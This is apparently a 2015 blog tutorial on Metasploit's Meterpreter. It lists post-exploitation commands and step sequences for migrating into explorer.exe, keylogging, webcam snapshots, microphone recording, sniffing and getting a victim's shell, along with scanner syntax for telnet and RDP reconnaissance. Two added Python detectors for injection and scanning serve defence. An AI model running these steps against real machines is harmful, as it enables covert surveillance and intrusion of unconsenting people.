METERPRETER BASICS

Saturday 2 May 2015



AFTER YOU GET A SESSION WITH THE HELP OF Metasploit, HERE ARE THE BASICS OF HOW TO USE meterpreter

HERE's THE SECRET


Meterpreter is one of the spearheads of the Metasploit framework.
It is used as a post-exploitation payload on a vulnerable system.
It uses in-memory DLL injection stagers and is extended over the network at runtime.
In-memory DLL injection is a technique for injecting code into the address space of a currently running process by forcing it to load a DLL (Dynamic-Link Library) file.

The single payload is very effective with its multiple capabilities:
> helps in acquiring password hashes of a victim machine
> running a keylogger and
> privilege escalation.

The stealth feature makes it undetectable to many antivirus and host-based intrusion detection systems.
Meterpreter also has the capability to switch between the different processes to which it gets attached through DLL injection, and it stays resident by clinging to a running application on the compromised host rather than creating a new process on the system.

Classified commands (grouped by command type, listed as command name -> description)

Process listing

> getuid -> It gets the system ID & the name of the computer
> kill -> It terminates a process
> ps -> It lists the running processes
> getpid -> It gets the current process identifier

Keylog Usage
> keyscan_start -> It starts the keylogging session
> keyscan_stop -> It stops the keylogging session
> keyscan_dump -> It dumps the keystrokes captured from the victim machine

Session
> enumdesktops -> It lists all of the accessible desktops and workstations
> getdesktop -> It gets the current Meterpreter desktop
> setdesktop -> It changes the Meterpreter's current desktop

Sniffer Functions
> use sniffer -> It loads the sniffer functions
> sniffer_start -> It starts the sniffer for the interface
> sniffer_dump -> It dumps the network capture of the victim machine locally
> sniffer_stop -> It stops the sniffer for the interface

Webcam Commands
> webcam_list -> It lists all of the webcams of the system
> webcam_snap -> It captures a snapshot from the victim machine's webcam
> record_mic -> It records the sound of the environment from the default microphone on the machine

Other useful commands
> sysinfo -> It checks the system information
> screenshot -> It captures a screenshot of the victim machine
> ps -> It shows the running processes

*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keyscan_start (and wait a few minutes to capture the keystrokes of the victim machine) -> keyscan_dump -> keyscan_stop (to dump the keystrokes and stop the keylogger)

*> webcam_snap (you get the snapshot from the webcam)

*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the victim computer)
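As an added example (not code from the original post), here is the defender's view of the in-memory DLL injection described earlier and of the migrate step just above: a detection heuristic over Sysmon-style CreateRemoteThread records (Sysmon Event ID 8). Remote-thread injection into a process such as explorer.exe commonly leaves a thread whose start address no loaded module backs, which is what the analyser keys on. The sample events, the PIDs and the allowlist of legitimate injectors are constructed assumptions, not data from a real host.

```python
"""Detection heuristic for process migration via remote-thread injection.

Added example, not code from the original post. It inspects Sysmon-style
CreateRemoteThread records (Event ID 8) for the pattern reflective DLL
injection commonly leaves: a thread started in another process from an
address that no loaded module backs. All events below are constructed
sample data; the allowlist is an assumption to be tuned per environment.
"""
from dataclasses import dataclass, field

# Assumption: processes that legitimately create threads in other processes
# on this workstation image. Anything else is treated as suspicious.
KNOWN_INJECTORS = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\svchost.exe",
}


@dataclass
class Finding:
    source_image: str
    source_pid: int
    target_image: str
    target_pid: int
    severity: str
    reasons: list = field(default_factory=list)


def analyse_remote_threads(events):
    """Return one Finding per CreateRemoteThread record worth triage."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 8:
            continue  # only CreateRemoteThread records matter here
        reasons = []
        # Reflectively loaded code lives in memory the loader never mapped,
        # so Sysmon cannot resolve StartAddress to a module name.
        if not ev.get("StartModule"):
            reasons.append("thread start address is not backed by any module")
        if ev["SourceImage"] not in KNOWN_INJECTORS:
            reasons.append("source process is not a known injector")
        if not reasons:
            continue
        # Both indicators together match the migrate pattern; one alone is
        # worth a look but is also produced by some benign software.
        severity = "high" if len(reasons) == 2 else "low"
        findings.append(Finding(
            source_image=ev["SourceImage"],
            source_pid=ev["SourceProcessId"],
            target_image=ev["TargetImage"],
            target_pid=ev["TargetProcessId"],
            severity=severity,
            reasons=reasons,
        ))
    return findings


# Constructed sample events (not from a real host). PID 1512 mirrors the
# explorer.exe example in the post.
SAMPLE_EVENTS = [
    {   # benign: csrss.exe starting a thread at a resolvable ntdll address
        "EventID": 8,
        "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": 612,
        "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 1512,
        "StartModule": r"C:\Windows\System32\ntdll.dll",
    },
    {   # suspicious: unknown binary, thread start not backed by a module
        "EventID": 8,
        "SourceImage": r"C:\Users\victim\Downloads\update.exe", "SourceProcessId": 4088,
        "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 1512,
        "StartModule": "",
    },
    {   # unrelated process-creation record, ignored by the analyser
        "EventID": 1,
        "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for f in analyse_remote_threads(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.source_image} (pid {f.source_pid}) -> "
              f"{f.target_image} (pid {f.target_pid}): {'; '.join(f.reasons)}")
```

Run as-is it reports only the second event, at high severity. The empty StartModule field is the stronger of the two signals: an allowlist of injectors has to be maintained per image, but an unbacked thread start in a user-facing process is rare in normal operation and survives a change of source binary.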


Vulnerability scanning and Information Gathering

>> Information Gathering Through Metasploit
Information gathering is the process of collecting information about a victim using various techniques.
It is divided into two steps:
> Footprinting
> Scanning

The Metasploit auxiliary modules have various scans, from ARP to SYN, as well as service-based scans:
> HTTP
> SMB
> SQL
> SSH

Methods for Information Gathering


>> whois
         It is widely used for querying databases that store the registered users of an Internet resource

type in msfconsole
   whois <domain name>
example whois hackingrtz.com

To get e-mail addresses we use e-mail harvesting
>  E-mail harvesting is a very useful tool to get the e-mail IDs associated with a particular domain

syntax
 use auxiliary/gather/search_email_collector -> show options -> set DOMAIN <domain name> -> run
for example :- set DOMAIN hackingartz.com

Active Information Gathering

A useful auxiliary scanner is the telnet version scanner

syntax
  use auxiliary/scanner/telnet/telnet_version -> show options -> see that the RHOSTS option is empty

syntax
   set RHOSTS <target ip address>
   for example :-  set RHOSTS 192.168.0.103 -> run

To find whether a Remote Desktop (RDP) connection is available, use the RDP scanner
You also need to know the RDP port number

Syntax : type in
     use auxiliary/scanner/rdp/ms12_020_check -> show options
After getting the port, we set RHOSTS

syntax
    set RPORT (port no.) -> set RPORT 3389
    set RHOSTS (ip address) -> set RHOSTS 192.168.11.46
Once done with all the options, type run
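As an added example (not code from the original post), here is what the telnet version and RDP probes above look like from the scanned network's side: a small scan detector over iptables-style SYN log lines. It reports a source sweeping one watched service port (telnet 23 or RDP 3389) across many hosts, and a source probing many ports on a single host. The log format, the thresholds and every address in the sample log are constructed assumptions.

```python
"""Scan detection over firewall logs, as a defender-side counterpart to the
telnet and RDP scanner modules described above.

Added example, not code from the original post. It parses iptables-style
SYN records (format assumed, samples constructed below) and reports two
behaviours: a horizontal sweep of a watched service port across many
hosts, and a vertical probe of many ports on one host.
"""
import re
from collections import defaultdict

# Assumed log shape: "... SRC=a.b.c.d DST=a.b.c.d ... PROTO=TCP SPT=n DPT=n ... SYN ..."
LOG_RE = re.compile(
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+).*?PROTO=TCP.*?DPT=(?P<dpt>\d+).*?\bSYN\b"
)

# Ports whose horizontal sweep is worth an alert on its own.
WATCHED_PORTS = {23: "telnet", 3389: "rdp"}


def parse_syn_lines(lines):
    """Yield (src, dst, dport) for every line that is a logged TCP SYN."""
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            yield m["src"], m["dst"], int(m["dpt"])


def detect_scans(lines, horizontal_threshold=3, vertical_threshold=10):
    """Return findings for horizontal sweeps of watched ports and vertical scans."""
    hosts_per_src_port = defaultdict(lambda: defaultdict(set))
    ports_per_src_dst = defaultdict(lambda: defaultdict(set))
    for src, dst, dport in parse_syn_lines(lines):
        hosts_per_src_port[src][dport].add(dst)
        ports_per_src_dst[src][dst].add(dport)

    findings = []
    for src, by_port in hosts_per_src_port.items():
        for dport, hosts in by_port.items():
            if dport in WATCHED_PORTS and len(hosts) >= horizontal_threshold:
                findings.append({
                    "kind": "horizontal", "src": src,
                    "service": WATCHED_PORTS[dport], "hosts": sorted(hosts),
                })
    for src, by_dst in ports_per_src_dst.items():
        for dst, ports in by_dst.items():
            if len(ports) >= vertical_threshold:
                findings.append({
                    "kind": "vertical", "src": src, "dst": dst,
                    "ports": sorted(ports),
                })
    return findings


def _line(src, dst, dport):
    # Builds one constructed iptables-style record.
    return (f"May  2 10:00:01 gw kernel: IN=eth0 OUT= SRC={src} DST={dst} "
            f"LEN=60 PROTO=TCP SPT=44321 DPT={dport} WINDOW=29200 SYN URGP=0")


# Constructed sample log (not a real capture).
SAMPLE_LOG = (
    # one host sweeping telnet across four neighbours
    [_line("192.168.0.50", f"192.168.0.{n}", 23) for n in (101, 102, 103, 104)]
    # a single RDP connection: below the horizontal threshold, not reported
    + [_line("192.168.0.50", "192.168.11.46", 3389)]
    # ordinary web traffic from a workstation
    + [_line("192.168.0.77", "192.168.0.10", 443), _line("192.168.0.77", "192.168.0.10", 80)]
    # a ten-port probe of one host
    + [_line("10.0.0.9", "192.168.0.103", p) for p in (21, 22, 23, 25, 80, 110, 135, 139, 443, 445)]
)

if __name__ == "__main__":
    for finding in detect_scans(SAMPLE_LOG):
        print(finding)
```

The single RDP connection is left unreported on purpose: at the firewall layer one ms12_020_check connection looks like any legitimate RDP client, so a sweep count or a per-host port count is what separates a scan from normal use. Tighten the thresholds on networks where telnet and RDP are not expected at all.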
